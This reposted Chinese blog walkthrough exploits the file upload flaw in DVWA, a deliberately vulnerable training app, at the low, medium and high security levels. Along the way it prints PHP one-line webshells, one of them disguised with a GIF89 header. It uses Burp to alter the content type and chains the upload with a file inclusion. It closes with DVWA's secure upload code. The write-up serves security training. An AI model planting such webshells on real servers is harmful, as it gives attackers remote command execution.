文件上传漏洞广泛存在于Web1.0时代,恶意攻击者的主要攻击手法是将可执行脚本(WebShell)上传至目标服务器,以达到控制目标服务器的目的。
此漏洞成立的前提条件至少有下面两个:
1.可以上传对应的脚本文件,并且被服务器解析,比如php上传为.php,Java则上传jar包等
2.上传文件之后,攻击者知道文件的地址,也就是说可以从浏览器地址栏访问到文件。
1. 防护级别为低(low)
<?php
phpinfo();
?>
点击上传,上传成功,并且可以看到上传的地址,这里满足了条件1:
在浏览器中拼接相关地址,http://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.phphttp://localhost:5555/hackable/uploads/1.phphttp://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.php:
如果在平时的渗透测试中,到这一步已经证明了漏洞存在。但是我为了增强实战能力,编写了对应的可执行脚本如下,这段代码很简单,从post请求中获取cmd参数,并且执行。这被称为一句话木马,相信大家知道了,通过向http://localhost:5555/hackable/uploads/1.php发出post请求,即可执行任意命令,也就是说等于拿到了服务器权限。
<?php
eval($POST['cmd']);
?>
一键使用此木马的工具以前有中国菜刀,现在有中国蚁剑(antsword)。我使用最新的antsword。
但是如下图发现返回数据为空,猜测是php版本为7导致的,所以我需要修改一下一句话木马。
我修改为如下的代码,希望可以运行成功,但是居然报了这么多的错误,
<?php
$pst = $POST['cmd'];
eval(pst);
?>
<?php
$pst = $_POST['hacker'];
@eval($pst);
?>
2.防护等级为中(medium)
点击查看源代码,发现其通过type来判断,于是可以使用burp修改发送的数据包来实现改变。
上传成功:
3.防护等级为高(High)
看到其对后缀名做了限制(jpg、jpeg、png),并且使用getimagesize函数确定文件头为图片。
GIF89
<?php
$p = $_POST['cmd'];
@eval($p);
?>
但是这是jpg文件,无法被服务器执行,所以我们使用前面的文件包含漏洞来执行:
但是我的文件包含没打开,即allow_url_include = Off。
使用以下命令打开,我的行数为824,如果不知道你的就cat来确定。
docker exec -it [容器id] /bin/bash # 进入容器
cd /etc/php/7.0
sed -i '824s/.*/allow_url_include = On/' php.ini
docker restart [容器id] # 重启容器
然后再次尝试上传文件成功,在地址栏打开,注意我修改了端口号。http://127.0.0.1/vulnerabilities/fi/?page=file:///var/www/html/hackable/uploads/2.jpg
:
但是使用蚁剑无法连接,不知道为什么,于是我又去做了一个图片马。
搞了很久才成功
我们来看看不可能出现漏洞的代码,可以看到其不仅判断了文件类型,还将文件名使用md5的方式进行了加密,就算上传可执行文件成功,攻击者也无法知道具体的文件名。还对文件内容做了限制,并且加上了CSRF验证。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
( $uploaded_size < 100000 ) &&
( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
getimagesize( $uploaded_tmp ) ) {
// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
if( $uploaded_type == 'image/jpeg' ) {
$img = imagecreatefromjpeg( $uploaded_tmp );
imagejpeg( $img, $temp_file, 100);
}
else {
$img = imagecreatefrompng( $uploaded_tmp );
imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
// Yes!
echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
}
else {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
// Delete any temp files
if( file_exists( $temp_file ) )
unlink( $temp_file );
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
原文地址:https://blog.csdn.net/weixin_39445116/article/details/134777706
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_42468.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!